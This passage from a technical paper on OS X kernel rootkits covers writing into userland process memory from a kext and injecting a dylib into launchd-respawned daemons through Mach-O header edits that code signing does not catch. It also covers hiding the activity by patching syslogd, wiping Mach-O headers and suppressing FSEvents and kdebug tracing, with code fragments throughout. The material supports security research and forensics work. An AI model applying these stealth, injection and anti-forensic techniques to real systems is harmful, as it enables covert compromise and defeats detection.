The only difference is that instead of reading directly from kernel memory we
have the information in temporary buffers with data read from the filesystem.
The proposed workflow is:
1) Read the first page of /mach_kernel, which contains the Mach-O header.
2) Process the Mach-O header and retrieve the following information:
- From __TEXT segment: vmaddr field (for ASLR slide computation).
- From __LINKEDIT segment: fileoff and filesize (so we can read the segment).
- From LC_SYMTAB command: symoff, nsyms, stroff, strsize.
Refer to [10] for more information about Mach-O file format.
3) Allocate buffer and read the whole __LINKEDIT segment.
4) Solve any required symbol by processing the __LINKEDIT buffer using the
LC_SYMTAB collected information (offsets to symbol and string tables).
5) Do not forget to add the kernel ASLR slide to the addresses. Slide can be
computed by the difference between running __TEXT vmaddr and the one read from
There is no need to read the whole mach_kernel file into kernel space, we just
need the headers and __LINKEDIT segment, around 1MB, smaller than the
7.8MB of Mountain Lion 10.8.2 full kernel. Kernel memory is at a premium :-)
--[ 4 - Executing userland binaries from the kernel
This section describes a technique to execute userland processes from a kernel
extension (not tested but should also be valid from IOKit drivers). For this
purpose wowie and ghalen used the KUNC API (Kernel-User Notification Center), a
straightforward interface to execute userland executables. One problem with KUNC
is that the required symbols are provided by the Unsupported KPI and Apple has
the following note: The Kernel-User Notification Center APIs are not available
to KEXTs that declare dependencies on the sustainable kernel programming
interfaces (KPIs) introduced in OS X v10.4.
Having different ways to accomplish a given goal is more fun and improves
knowledge, which is this paper's main goal. The technique to be presented is
probably not the most efficient one but it is a good learning experience about
playing with kernel and how everything is implemented.
----[ 4.1 - Writing from kernel memory into userland processes
The first step is to find a way to write to userland process addresses from a
kernel extension. In userland there is the mach_vm_write() function (or older
vm_write()) to write to any arbitrary process, assuming we have the right
permissions to do so (task_for_pid() is our friend).
Its prototype is:
kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address,
vm_offset_t data, mach_msg_type_number_t dataCnt);
If you look at the definition of the task structure (a void* at proc structure
but defined at osfmk/kern/task.h) you can find the first parameter to
mach_vm_write in the "map" field. The remaining parameters are the target
address, the data buffer to write and its size.
Do not forget that we need first to use mach_vm_protect (or vm_protect) to
change memory protections if trying to write to the read-only segments/sections.
The problem with this approach is that it does not work!
The memory protection is changed but mach_vm_write() does not modify the target
address. The answer is that if called like this we are trying to write data from
kernel space directly to the userland space, which should (obviously!) fail.
Remember we need to use copyin/copyout to copy between the two spaces.
We need another solution and I will present not one but two, both easy to use.
Thanks go to snare for giving me some initial sample code from his own research.
The first solution uses three functions, vm_map_copyin(), vm_map_copyout(), and
mach_vm_copy(). You can read their description at osfmk/vm/vm_map.c and
vm_user.c in XNU sources.
vm_map_copyin creates an object from a given address located in a given map that
we can insert into another address space. This assures the correct transition
between kernel and user virtual memory spaces.
The vm_map_copyout() function copies the object into the target map, aka, our
target process. We need the vm_map_t info for kernel and target process - both
can be found by iterating proc list or proc_find(), as previously described.
There is one important detail about vm_map_copyout!
It injects the object "into newly-allocated space in the destination map". What
this means is that we are just copying the data into a new memory address at the
user process and not at the target address we want.
Let me show you with an example of what happens using that command:
char *fname = "nemo_and_snare_rule!";
kern_return_t kr = 0;
vm_map_address_t dst_addr;
kr = vm_map_copyin(kernel_task->map, (vm_map_address_t)fname, strlen(fname)+1,
FALSE, &copy);
kr = vm_map_copyout(task->map, &dst_addr, copy);
dst_addr will contain the value 0x11fa000 (target was a 32 bits process).
Dumping the process memory:
sh-3.2# ./readmem -p 121 -a 0x11fa000 -s 32
[ Readmem v0.4 - (c) fG! ]
Memory protection: rw-/rwx
0x11fa000 6e 65 6d 6f 5f 61 6e 64 5f 73 6e 61 72 65 5f 72 nemo_and_snare_r
0x11fa010 75 6c 65 21 00 00 00 00 00 00 00 00 00 00 00 00 ule!............
At this point we need to copy the contents to the target address we want to.
This can be achieved using mach_vm_copy() - a function that copies one memory
region to another within the same task. The address where the data was copied to
can be found at the second parameter of vm_map_copyout().
It must be noticed that the first two functions are available as Private KPIs
and mach_vm_copy() is not exported (I cheated in above's example). Not a big
problem since we can easily solve the symbols.
The sample code to write to the Mach-O header of a 32 bits, no ASLR binary could
be something like this:
// get proc_t structure and task pointers
struct proc *p = proc_find(PID);
struct proc *p_kernel = proc_find(0);
struct task *task = (struct task*)(p->task);
struct task *kernel_task = (struct task*)(p_kernel->task);
kern_return_t kr = 0;
vm_prot_t new_prot = VM_PROT_WRITE | VM_PROT_READ;
kr = mach_vm_protect((vm_map_t)task->map, 0x1000, len, FALSE, new_prot);
vm_map_copy_t copy;
char *fname = "nemo_and_snare_rule!";
vm_map_address_t dst_addr;
// create a vm_map_copy_t object so we can insert it at userland process
kr = vm_map_copyin(kernel_task->map, (vm_map_address_t)fname,
strlen(fname)+1, FALSE, &copy);
// copy the object to userland, this will allocate a new space into target map
kr = vm_map_copyout((vm_map_t)task->map, &dst_addr, copy);
printf("wrote to userland address 0x%llx\n", CAST_USER_ADDR_T(dst_addr));
// and now we can use mach_vm_copy() because it copies data within the same task
kr = mach_vm_copy((vm_map_t)task->map, CAST_USER_ADDR_T(dst_addr),
strlen(fname)+1, 0x1000);
// release references created with proc_find() - must be always done!
To deallocate that new allocated space in userland vm_map_remove() is a good
* vm_map_remove:
* Remove the given address range from the target map.
* This is the exported form of vm_map_delete.
extern kern_return_t
vm_map_remove(vm_map_t map,
vm_map_offset_t start,
vm_map_offset_t end,
boolean_t flags);
An easy alternative is to just zero those bytes and assume that space as a small
memory leak. It works and it is not a big deal.
The second solution requires a single function and has no memory allocation
at the target process. We are talking about vm_map_write_user():
"Copy out data from a kernel space into space in the destination map. The space
must already exist in the destination map."
The prototype:
vm_map_write_user(vm_map_t map, void *src_p, vm_map_address_t dst_addr,
vm_size_t size);
Where map is the vm_map_t of the target process, and src_p the kernel data
buffer we want to write to the process. The previous example using this
struct proc *p = proc_find(PID);
struct task *task = (struct task*)(p->task);
kern_return_t kr = 0;
vm_prot_t new_protection = VM_PROT_WRITE | VM_PROT_READ;
char *fname = "nemo_and_snare_rule!";
// modify memory permissions
kr = mach_vm_protect(task->map, 0x1000, len, FALSE, new_protection);
kr = vm_map_write_user(task->map, fname, 0x1000, strlen(fname)+1);
This alternative is easier and does not allocate new memory at the target.
Do not forget to restore the original memory permissions.
After so many words you are probably asking why not use copyout to copy from
kernel to userland? Well, of course it is possible but there is a problem. It
can't be used to overwrite to arbitrary processes - only against the current
process. Even if we try to change the current map to another process using
vm_map_switch(), copyout will always retrieve the current process so copyout
will fail with EFAULT if we try an address of another process that does not
exists in current. This means that it can be used, for example, inside a hooked
syscall but not to write to arbitrary processes.
----[ 4.2 - Abusing (again!) dyld to inject and run code
Most of the time hacking is about abusing features or lack-of. This time we are
going to piggyback on dyld and launchd. Poor bastards!
The idea is that launchd will restart our target process and dyld will be
responsible for executing our code. I used the dyld approach in OS.X/Boubou PoC
described at [12] and [34], so why not again? It is easy to implement and works
very well.
The core of this idea is to emulate the DYLD_INSERT_LIBRARIES (equivalent
to LD_PRELOAD for those coming from ELF Unix world) when a new process is
created. The library will be responsible for executing whatever we want to.
In this case we want to modify the Mach-O header before passing control to dyld.
When dyld gains control (it is dyld who passes control to target's entrypoint
not the kernel) it will read the header from target's memory and process it.
This presents an opportunity to successfully modify and inject the Mach-O
The presentations at Secuinside [11] and HitCon [12] discuss the Mach-O header
details and injection process. This is valid for dynamically linked executables,
where execution will start at the dynamic linker (/usr/lib/dyld) and then
continue at the executable entry point.
Launchd is the perfect target because it can automatically respawn daemons and
agents, at root or user privilege level. The idea is to kill a daemon, intercept
the respawn and inject the library we want to be executed. The privilege level
we want to execute at depends on the target daemon.
What we need is to find a good place to intercept the respawn of the target
process and modify its memory before control is passed to dyld.
A simplified version of the binary execution process, adapted from [13] is:
execve() -> __mac_execve()
Read file
.----> exec_mach_imgact() -> run dyld -> target entry point
| |
| v
| load_machfile()
| |
| v
| parse_machfile() [maps the load commands into memory]
| |
| v
| load_dylinker() [sets image entrypoint to dyld]
| |
| v
`--------- (...)
Chapter 7 of [14] and Chapter 13 of [13] thoroughly describe the execution
process in case you are interested in every detail.
The above diagram presents many places where we can modify the new process
memory and its Mach-O header. As previously mentioned, when dyld gains
control it will parse again the Mach-O header so our modification is guaranteed
to be used if made before dyld's control.
We can confirm this by looking at dyld source code [15]:
// Entry point for dyld. The kernel loads dyld and jumps to __dyld_start which
// sets up some registers and call this function.
// Returns address of main() in target program which __dyld_start jumps to
_main(const macho_header* mainExecutableMH, uintptr_t mainExecutableSlide,
int argc, const char* argv[], const char* envp[], const char* apple[],
uintptr_t* startGlue)
One curious detail (without any practical application I can foresee now) is that
dyld does not validate the header - the magic value can be modified to anything
and dyld will happily continue its work. Kernel data can be trusted, right?
----[ 4.3 - Finding the place to execute the injection
With theory in place it is finally time to move to practice!
We need to find one or more places where we can modify the target process memory
and inject our dynamic library.
The kernel has no symbol stubs so we can't just modify a pointer and hijack a
useful function. One solution is to inline hook the function prologue and make
it jump to our function. We can simplify this by implementing the whole original
function (copy from XNU source into our rootkit); this way we do not need to
return back to the original one, just restore the original bytes when we finish
our evil work.
A good starting point to look for candidate functions is exec_mach_imgact(). The
reason why is that when it returns control to dyld everything required to
execute the new process is set (kernel side). As much as possible near its end
is best.
After exploring exec_mach_imgact, I found a good candidate at
task_set_dyld_info(). It is called twice, one before the image is loaded into
memory, and another after the image is loaded. Clearly, the former does not
interest us so we need to distinguish between each case. This function is only
used at exec_mach_imgact().
Looking at its code in osfmk/kern/task.c:
task_set_dyld_info(task_t task, mach_vm_address_t addr, mach_vm_size_t size)
task->all_image_info_addr = addr;
task->all_image_info_size = size;
The locks calls are nothing else than macros using a symbol available in KPIs:
#define task_lock(task) lck_mtx_lock(&(task)->lock)
#define task_unlock(task) lck_mtx_unlock(&(task)->lock)
It is a great candidate - we can copy & paste its code into our rootkit source,
add our code to inject the library and then execute the original function code.
Because it is not a static function we can find its symbol.
The first parameter is a task_t structure, which has a pointer to the
correspondent proc_t structure (remember that proc and task structures are
connected to each other via void pointers).
The proposed workflow could be:
1) Find task_set_dyld_info() address.
2) Patch prologue to jump to our function.
3) Execute our function to inject library.
4) Restore original bytes from 2).
5) Execution continues, our library is executed by dyld.
The only problem with this function is here at exec_mach_imgact():
* Remember file name for accounting.
p->p_acflag &= ~AFORK;
/* If the translated name isn't NULL, then we want to use
* that translated name as the name we show as the "real" name.
* Otherwise, use the name passed into exec.
if (0 != imgp->ip_p_comm[0]) {
bcopy((caddr_t)imgp->ip_p_comm, (caddr_t)p->p_comm,
} else {
if (imgp->ip_ndp->ni_cnd.cn_namelen > MAXCOMLEN)
imgp->ip_ndp->ni_cnd.cn_namelen = MAXCOMLEN;
bcopy((caddr_t)imgp->ip_ndp->ni_cnd.cn_nameptr, (caddr_t)p->p_comm,
p->p_comm[imgp->ip_ndp->ni_cnd.cn_namelen] = '\0';
The process name in proc_t structure is only set after the second call to
task_set_dyld_info(), so we can't use it to detect which process is going to be
executed and trigger or not our injection (remember we are only interested in a
specific process to be executed by launchd). A workaround to this problem is to
lookup the open files structure in proc_t (p_fd field).
An alternative solution is to use another function! There is an even better one
near the end of exec_mach_imgact() called proc_resetregister(). The advantage of
being near the end is that we can change a lot more things (kernel completed
most of its tasks related to new process execution), opening way for some cute
Its implementation is also very simple [bsd/kern/kern_proc.c]:
void proc_resetregister(proc_t p)
p->p_lflag &= ~P_LREGISTER;
The lock/unlock here are implemented as functions instead of macros and not
exported. We can simply define the macros or change our code to use lck_mtx_*.
This time we have a proc_t structure and can use the p_comm field to find our
target(s) (or proc_name() to get the name of a given pid). Perfect spot!
With a location where to execute our modifications we can proceed to the last
step, modify the target Mach-O header.
----[ 4.4 - Ideas are great, execution is everything
Assuming that our hijacked function is proc_resetregister(), we can extract all
the information we will need from the proc_t parameter. Let's proceed with
The number of binaries that use ASLR is increasing so the first step is to find
at which memory address is the binary loaded (the Mach-O header to be more
specific). The ASLR slide is generated inside load_machfile() and not set in a
struct/var or returned. One way to solve the problem is to take a peak at the
virtual memory map (vmap) of the target process. The following does the job
(assuming we are inside our own proc_resetregister()):
struct task *task = (struct task*)p->task;
mach_vm_address_t start_address = task->map->hdr.links.start;
Start contains the lower address of the process, which is where the Mach-O
header is located at. This *appears* to hold always true (there are good reasons
to believe it!).
To modify the Mach-O header of the target process we need to parse the header to
find free space where we can add the new LC_LOAD_DYLIB command. The necessary
free space is common - most binaries have enough slack space between the last
command and first code/data.
The header can be retrieved from the user space with vm_map_read_user() or
copyin (because here we are executing in current proc context).
After we have found the free space and the full Mach-O header is in our buffer,
we just need to add a new LC_LOAD_DYLIB command.
The two below diagrams show what needs to be done at the Mach-O header:
| HEADER |<- Fix this struct:
|-------------------| struct mach_header {
| Load Commands | uint32_t magic;
| .-------------. | cpu_type_t cputype;
| | Command 1 | | cpu_subtype_t cpusubtype;
| |-------------| | uint32_t filetype;
| | Command 2 | | uint32_t ncmds; <- add +1
| |-------------| | uint32_t sizeofcmds; <- += size of new cmd
| | ... | | uint32_t flags;
| |-------------| | };
| | Command n | |
| |-------------| |
| | Command n+1 | |<- add new command here:
| `-------------´ | struct dylib_command {
|-------------------| uint32_t cmd;
| Data | uint32_t cmdsize;
| .---------------. | struct dylib dylib;
| | | Section 1 | | };
| | 1 |-----------| | struct dylib {
| | | Section 2 | | union lc_str name;
| `---------------´ | uint32_t timestamp;
| .---------------. | uint32_t current_version;
| | | Section 1 | | uint32_t compatibility_version;
| | 2 |-----------| | };
| | | Section 2 | | union lc_str {
| `---------------´ | uint32_t offset;
| ... | #ifndef __LP64__ // not used
| | char *ptr;
| | #endif
| | };
A diff between original and modified:
.-------------------. .-------------------.
| HEADER | | HEADER |<- Fix this struct
|-------------------| |-------------------| struct mach_header {
| Load Commands | | Load Commands | ...
| .-------------. | | .-------------. | uint32_t ncmds; <- fix
| | Command 1 | | | | Command 1 | | uint32_t sizeofcmds;<- fix
| |-------------| | | |-------------| | ...
| | Command 2 | | | | Command 2 | | };
| |-------------| | | |-------------| |
| | ... | | | | ... | |
| |-------------| | | |-------------| |
| | Command n | | | | Command n | |
| `-------------´ | | |-------------| |
| |---->| | Command n+1 | |<- add new command here
| |---->| `-------------´ | struct dylib_command {
|-------------------|---->|-------------------| uint32_t cmd;
| Data |---->| Data | uint32_t cmdsize;
| .---------------. |---->| .---------------. | struct dylib dylib;
| | | Section 1 | |---->| | | Section 1 | | };
| | 1 |-----------| | | | 1 |-----------| |
| | | Section 2 | | | | | Section 2 | |
| `---------------´ | | `---------------´ |
| .---------------. | | .---------------. |
| | | Section 1 | | | | | Section 1 | |
| | 2 |-----------| | | | 2 |-----------| |
| | | Section 2 | | | | | Section 2 | |
| `---------------´ | | `---------------´ |
| ... | | ... |
`-------------------´ `-------------------´
There are other methods to inject the library if there is not enough space. One
that requires only 24 bytes is described at [16].
This approach has one interesting advantage - it is not detectable by code
signing because the injection occurs after its checks and flags are set.
This is the code that sets the flags:
* Set code-signing flags if this binary is signed, or if parent has
* requested them on exec.
if (load_result.csflags & CS_VALID) {
imgp->ip_csflags |= load_result.csflags &
} else {
imgp->ip_csflags &= ~CS_VALID;
if (p->p_csflags & CS_EXEC_SET_HARD)
imgp->ip_csflags |= CS_HARD;
if (p->p_csflags & CS_EXEC_SET_KILL)
imgp->ip_csflags |= CS_KILL;
The code snippet is from exec_mach_imgact() and located well before our two
candidate functions described in section 4.3. Code signing does not kill
immediately the process. The flags are verified later and a kill signal sent
if code signing was configured to exit on failure (which we can also modify
The only puzzle piece left is which process should we use and how to kill it.
There are many root processes controlled by launchd so it is just a matter of
selecting one with invisible and/or small impact. Spotlight is for example a
good candidate. A code snippet to do the killing:
proc_t victim = proc_find(TARGET_PID);
if (victim != PROC_NULL)
// we need to release reference count from proc_find() before kill
// now we can kill the process
psignal(kill, SIGKILL); // or use SIGSEV coz' Spotlight crashes, right? :-)
When launchd respawns the process, we can intercept it at exec_mach_imgact() and
do our magic. The rest is responsibility of the dynamic library.
----[ 4.5 - The dynamic library
The dynamic library is very easy to create if you use the Xcode template (oh the
drama, hackers use Makefiles!) or just Google for a simple Makefile.
To execute the library code you can add an entrypoint via a constructor:
extern void init(void) __attribute__ ((constructor));
void init(void)
// do evil stuff here
init will be executed as soon as the library is loaded. Another way could be by
modifying the injected process symbol stub and redirect to an entrypoint
function inside the library. While the symbol stub modification could be made
from the kernel, we do not know yet where library will be loaded so it is harder
to execute this. For example, it could be delayed by hijacking a syscall, wait
for its execution and then modify a symbol. The downside is more time for
detection as explained in next section. Honestly I have not thought much about
this case.
To execute commands from the library it is just a matter of fork'ing and
exec'ing whatever command we need. We can also create a new thread (or multiple)
to leave a resident backdoor and so on. Or just execute the command we need and
clean up ourselves to leave no traces.
It is up to you and your particular requirements and imagination :-).
----[ 4.6 - Hiding our tracks
By principle, a rootkit should be as stealth as possible - we need to cover our
tracks to the maximum possible extent. Let me discuss a few problems and
potential solutions with the previously described approaches.
The first one is that we need to restart a target process. This will leave an
immediate clue on a (potentially very) higher PID, depending when the method is
used (near startup it is ok).
Another clue is that we are sending a signal to the target process and syslogd
will capture it. Instead of a kill we could send a SIGSEGV (Apple's software has
bugs, right?), or just temporarily memory patch syslogd daemon to avoid logging
our little trick. Different possibilities to solve this problem!
The SIGSEGV is particularly interesting since the resulting crash dump has no
useful information and it only leaves this log trail:
12/21/12 3:27:13.093 AM[1]: ([277]) Job
appears to have crashed: Segmentation fault: 11
Patching (temporarily or not) syslogd is rather easy to accomplish. Looking at
Apple's syslogd source we can find the following function in syslogd/daemon.c:
void process_message(aslmsg msg, uint32_t source)
Near the end it has this code:
/* send message to output modules */
if (global.bsd_out_enabled) bsd_out_message(msg);
The asl_out_message() appears to be the interesting place to patch. To quickly
test this theory we can attach gdb to syslogd (warning, ASLR enabled), and patch
that function. We need to search the function address because there are no debug
symbols available .
Let's look at its implementation:
void asl_out_message(aslmsg msg)
asl_msg_retain((asl_msg_t *)msg);
dispatch_async(asl_action_queue, ^{
asl_msg_release((asl_msg_t *)msg);
There are two external symbols, dispatch_flush_continuation_cache() and
asl_msg_retain(). The former has only a reference and the latter two. To find
the location of asl_out_message() we just need to find out the proc_t for
syslogd process, read and process its symbol table (we can read from memory or
filesystem), correct for ASLR slide, and find the address of the stub. Since
this is not IDA we can't easily find the cross-references (oh, IDA spoils us).
What we can do is search in the binary the calls to the symbol stub (it is a
relative offset call). Even easier (and probably faster) is to disassemble and
match the address of the call with the stub - the disassembler will output the
final address.
After we have the address where dispatch_flush_continuation_cache() is called
from we just need to find the function prologue and patch it with a ret
(function return is void so no need for xor eax,rax). We can then restore the
original byte after we execute our command. Another function, bsd_out_message()
might need to be patched, but I leave that task to you, the reader.
Another alternative is to try to recycle the PID that was killed. The forkproc()
function is the one that allocates the new PID for the child. Might be
interesting to research and explore this alternative. You also might want to
reorder the proc list and move the new element to the original location instead
of being in newer location. Many possibilities to hide and try to detect the
rootkit actions. That is why it is fun!
The next issue is that process memory will have our injected library so we want
to remove it as soon as possible. I did some interesting work in this area but
NDA oblige and can't disclose it. It can be done and you should think about it,
or just use a brute approach and kill the process again and this time do not
inject anything. Whatever works :-)
There is no need to have a resident library somewhere at the filesystem ready to
be discovered. We can read and write from and to anywhere the filesystem so we
can store the library code encrypted inside the kernel module or store it
somewhere else, for example in a sqlite3 database (there are so many spread
all over OS X). Before the injection we can unpack it somewhere, execute it, and
then remove when not needed anymore.
One thing I had no time to verify if the impact from Spotlight if we use the
unpacking to filesystem approach. It might be able to detect the new file and
store in its database, so we must be careful over here.
--[ 5 - Revisiting userland<->kernel communication
Fortunately there are many options to establish communication between kernel and
userland applications in OS X. The sysctl interface previously presented [1] is
easy to implement but it is too cumbersome to transfer large amounts of data.
Let me present you additional options.
----[ 5.1 - Character devices and ioctl
The easiest way to have userland<->kernel communication is to create a
character device and use the ioctl interface to control it. We just need to
create and register the new device and add the necessary entry point functions.
It all starts with the structure cdevsw:
* Character device switch table
struct cdevsw {
open_close_fcn_t *d_open;
open_close_fcn_t *d_close;
read_write_fcn_t *d_read;
read_write_fcn_t *d_write;
ioctl_fcn_t *d_ioctl;
stop_fcn_t *d_stop;
reset_fcn_t *d_reset;
struct tty **d_ttys;
select_fcn_t *d_select;
mmap_fcn_t *d_mmap;
strategy_fcn_t *d_strategy;
void *d_reserved_1;
void *d_reserved_2;
int d_type;
The most interesting entrypoints for our purposes are open, close, ioctl.
If you are interested in using this communication channel, you probably should
think about encrypting it or some kind of authentication method. OS.X/Crisis has
no authentication whatsoever so anyone can send commands to the kernel rootkit
after (easily) finding all the possible ioctl commands.
The code is very simple so there is no point in discussing it here. The provided
source code implements this and kernel control so you can browse it and
verify how it is done.
Besides the problems with encryption, authentication and ioctl commands
reversing, this solution creates a new character device that needs to be hidden
or else it will be too easy to detect. And then we have additional traces inside
the kernel structures that need to be hidden, creating a vicious circle (rootkits
are a vicious circle of hide & seek and that is why they can be so fun to write
----[ 5.2 - Kernel Control KPI
The kernel control KPI is interesting because it allows bidirectional
communication with userland and transfer of large amounts of data. Its
implementation is rather simple via a regular socket (PF_SYSTEM). Apple's
reference documentation can be found at [17] and sample code at [18].
A kernel extension is responsible for creating the socket and the userland part
will read and send data to that same socket (socket access can be restricted to
privileged users or everyone).
The kernel implementation is done by registering a control structure
kern_ctl_reg defined at bsd/sys/kern_control.h. From Apple's example:
// the reverse dns name to be used between kernel and userland
#define BUNDLE_ID ""
static struct kern_ctl_reg g_ctl_reg = {
BUNDLE_ID, /* use a reverse dns name */
0, /* set to 0 for dynamically assigned control ID */
0, /* ctl_unit - ignored when CTL_FLAG_REG_ID_UNIT not set */
CTL_FLAG_PRIVILEGED,/* privileged access required to access this filter */
0, /* use default send size buffer */
0, /* Override receive buffer size */
ctl_connect, /* Called when a connection request is accepted */
ctl_disconnect, /* called when a connection becomes disconnected */
NULL, /* handles data sent from the client to kernel control */
ctl_set, /* called when the user process makes the setsockopt call */
ctl_get /* called when the user process makes the getsockopt call */
The connect and disconnect functions handle userland connections. When a new
connection is established we need to retain the unit id and control reference -
they are required for sending data and removing the kernel control.
The ctl_get function handles the communication from kernel to userland - sends
data to the socket when client requests it, and ctl_set handles data from
userland to kernel. The kernel data to be sent to userland should be enqueued
using ctl_enqueuedata() (this is where we need the unit id and control
A quick example of a function to enqueue the PID of a process:
static u_int32_t gClientUnit = 0;
static kern_ctl_ref gClientCtlRef = NULL;
* get data ready for userland to grab
* send PID of the suspended process and let the userland daemon do the rest
queue_userland_data(pid_t pid)
errno_t error = 0;
if (gClientCtlRef == NULL) return KERN_FAILURE;
error = ctl_enqueuedata(gClientCtlRef, gClientUnit, &pid, sizeof(pid_t), 0);
if (error) printf("[ERROR] ctl_enqueuedata failed with error: %d\n", error);
return error;
Another important detail is about the control ID. Since the recommended way is
to use a dynamically assigned control ID, the userland client needs somehow to
retrieve it. This can be done using a ioctl request (the reverse dns name must
be shared between the kernel and userland).
int gSocket = -1;
struct ctl_info ctl_info;
struct sockaddr_ctl sc;
// the control ID is dynamically generated so we must obtain sc_id using ioctl
memset(&ctl_info, 0, sizeof(ctl_info));
strncpy(ctl_info.ctl_name, "", MAX_KCTL_NAME);
ctl_info.ctl_name[MAX_KCTL_NAME-1] = '\0';
if (ioctl(gSocket, CTLIOCGINFO, &ctl_info) == -1)
perror("ioctl CTLIOCGINFO");
printf("ctl_id: 0x%x for ctl_name: %s\n", ctl_info.ctl_id,
// build the sockaddr control structure and finally connect to the socket
bzero(&sc, sizeof(struct sockaddr_ctl));
sc.sc_len = sizeof(struct sockaddr_ctl);
sc.sc_family = AF_SYSTEM;
sc.ss_sysaddr = AF_SYS_CONTROL;
sc.sc_id = ctl_info.ctl_id;
sc.sc_unit = 0;
ret = connect(gSocket, (struct sockaddr*)&sc, sizeof(sc));
After connection to the socket is established, the userland client can send data
using setsockopt() and receive with recv(). The remaining implementation details
are easy to understand by reading Apple's referenced sample code.
This communication channel might not be that interesting for rootkit'ing
purposes because it requires additional effort to hide, in particular the socket
information that can be explored by memory forensic tools. If commercial spyware
is using character devices for communication then we can't forget this
possibility when analysing a potentially compromised machine.
Nevertheless it can be interesting for other purposes. As an example, I created
a PoC (to be released later) to stop certain processes when they are created (
p->p_stat = SSTOP) and communicate their PID to a userland daemon. The userland
daemon attaches to the process and modifies whatever it needs. In this
particular case it is used to patch code signed applications without needing to
resign and patch any checksum checks. We already saw that OS X code-signining
verifications are done before the process is stopped and do not detect these
modifications (application own run-time code checksum checks are another
story!). It is not the best solution but just a nice set of tricks and demo
usage of this communication channel.
----[ 5.3 - Alternative channels
The two presented solutions are easy to setup and use but also easy to detect.
Their main problem is that they leave "permanent" traces that need to be hidden
(kernel structures for example). This increases rootkit's complexity and chances
of being detected.
Covert channels are a lot more appropriate and a lot has been written about
them. Since it is so easy to use almost any kernel function, the possibilities
to be creative in this department are much higher. Data can be stealthy
read and written anywhere in the filesystem, bypassing many detection and
instrumentation mechanisms as it will be shown next. At the limit there is no
real need for a direct communication channel! For example, data can be encoded
in a binary and intercepted when it is executed. The possibilities are really
endless. This very short section is just a reminder that rootkit design can
be different from what is usually done and that you should think about it,
whether you belong to the offensive or defensive side.
--[ 6 - Anti-forensics
Mac OS X kernel is instrumentation rich, featuring DTrace and others. These can
assist in rootkit uncloaking. Memory forensics is also playing an important
role these days in malware detection and analysis. This section goal is to
present some ideas on how to attack or hide from these technologies. It is not
an exhaustive list but it tries to cover the main ones. OS X kernel is still big
and full of interesting places to be explored. Keep that in mind!
Due to time constraints it is not possible to write about fooling/defeating the
memory forensics tools as I initially planned. It was somewhat similar to what
was presented at 29C3 in Defeating Windows memory forensics presentation [33]
and other similar work presented in the past.
----[ 6.1 - Cheap tricks to reduce our footprint
An extremely easy trick to pull without any side consequences for us is to
remove the Mach-O header from process's memory. A memory dump will require
additional effort to find and rebuild the original binary (harder in userland
binaries, simpler in kernel extensions). Do not forget that Mach-O header
permissions are R-X so make it writable first.
Kernel extensions must have a start and stop function. Their prototype specifies
a kmod_info_t structure as first parameter. It is part of a linked list of all
loaded kernel extensions (used to hide the rootkit from kextstat but now marked
deprecated) and contains a very useful field to apply this cheap trick.
typedef struct kmod_info {
struct kmod_info * next;
int32_t info_version; // version of this structure
uint32_t id;
char name[KMOD_MAX_NAME];
char version[KMOD_MAX_NAME];
int32_t reference_count; // # linkage refs to this
kmod_reference_t * reference_list; // who this refs (links on)
vm_address_t address; // starting address
vm_size_t size; // total size
vm_size_t hdr_size; // unwired hdr size
kmod_start_func_t * start;
kmod_stop_func_t * stop;
} kmod_info_t;
The "address" field contains the starting address of the currently loaded kext,
including the ASLR slide (kernel and kernel extensions Mach-O header values
include the current kernel ASLR slide). With this information we just need to
find out the total size of the header and nuke it:
int nuke_mach_header(mach_vm_address_t address)
struct mach_header *mh = (struct mach_header_64*)address;
uint32_t header_size = 0;
if (mh->magic == MH_MAGIC_64)
header_size = mh->sizeofcmds + sizeof(struct mach_header_64);
else return 1;
// we have total header size and startup address
// disable CR0 write protection
memset((void*)my_address, 0, header_size);
return 0;
Instead of just zero'ing the header you could fill it with random junk data for
fun. You can even mangle data from the other commands (LINKEDIT, LC_SYMTAB,
LC_DYSYMTAB, LC_UUID). For example, there are no symbol stubs in kernel -
symbols are solved when kernel extension is loaded and calls are made
directly to the referenced symbol. This is a problem because it can be used to
detect valid code and get hints on what it is trying to do. One can generate a
table of all kernel symbols and use it to find cross references in kernel memory
and dump that code.
Function pointers can help to hide our code - the question is how easy or not it
is to bootstrap the rootkit to search the required symbols. One solution can be
to use the techniques described before to find the symbols and then mangle the
bootstrap code - only leave in memory code using function pointers.
Be creative, try to reduce your footprint to the maximum :-).
----[ 6.2 - Attacking DTrace and other instrumentation features
Mac OS X has many instrumentation features available. There are at least DTrace,
FSEvents, Kauth, kdebug, and TrustedBSD. TrustedBSD's original goal is not
instrumentation related but can be used (or abused) for this purpose. Kauth is
explored in Section 6.3 with AV-Monster II, while all the others in the next
------[ 6.2.1 - FSEvents
FSEvents is an API for file system notification. Applications register for
events that are interested in and receive them via /dev/fsevents. A file system
monitor can be built on top of this - the usual suspects [13] and [14] offer a
good explanation about its internals and code samples. Jonathan Levin has a
"filemon" tool available at his book companion web site.
The responsibility to add the events belongs to the function add_fsevent()
[bsd/vfs/vfs_fsevents.c]. It is a bit long vararg function and I do not want to
spend space and time analysing it. Amit Singh has a nice figure on page 1421 of
[14] with functions that add events. For example, the open syscall can generate
a file create event (FSE_CREATE_FILE).
The next diagram shows the how the event is added:
open() -> open_nocancel() -> open1() [bsd/vfs/vfs_syscalls.c]
[bsd/vfs/vfs_vnops.c] vn_open_auth() -> vn_open_auth_do_create()
[bsd/vfs/vfs_fsevents.c] add_fsevent() <- need_fsevent()
In this particular case we could hijack need_fsevent(), match the file we want
to hide and return 0 to avoid event generation. In many cases there is a direct
call to add_fsevent() so we also need to hijack it. Inside our new function we
need to retrieve the necessary information to match the event we want to hide
and return EINVAL or 0 in those cases. You should study the add_fsevent()
function to understand how to implement this. I do not think there is much value
in describing it here - there are more (interesting) topics to cover.
------[ 6.2.2 - kdebug
kdebug is another (rather obscure) kernel trace facility used only by Apple
utils such as fs_usage and sc_usage. Documentation is poor and the best
references are those utils source code and a few pages by Levin [13].
The relevant include file is bsd/sys/kdebug.h. kdebug is implemented in kernel
functions that might produce relevant events using KERNEL_DEBUG() macro. The
kernel functions involved (in that macro) are kernel_debug() and
kernel_debug_internal() (with always inline attribute).
A 32 bits integer is used for the debug messages, with the following format:
| | | |Func |
| Class (8) | SubClass (8) | Code (14) |Qual(2)|
For example, filesystem operations use class DBG_FSYSTEM (3) and different
subclasses to filter between different operations such as read and writes to
filesystem, vnode operations, HFS events, etc (consult kdebug.h include).
Macros exist to encode the integer for each available class. Using BSD class as
an example:
#define KDBG_CODE(Class, SubClass, code) (((Class & 0xff) << 24) | ((SubClass &
0xff) << 16) | ((code & 0x3fff) << 2))
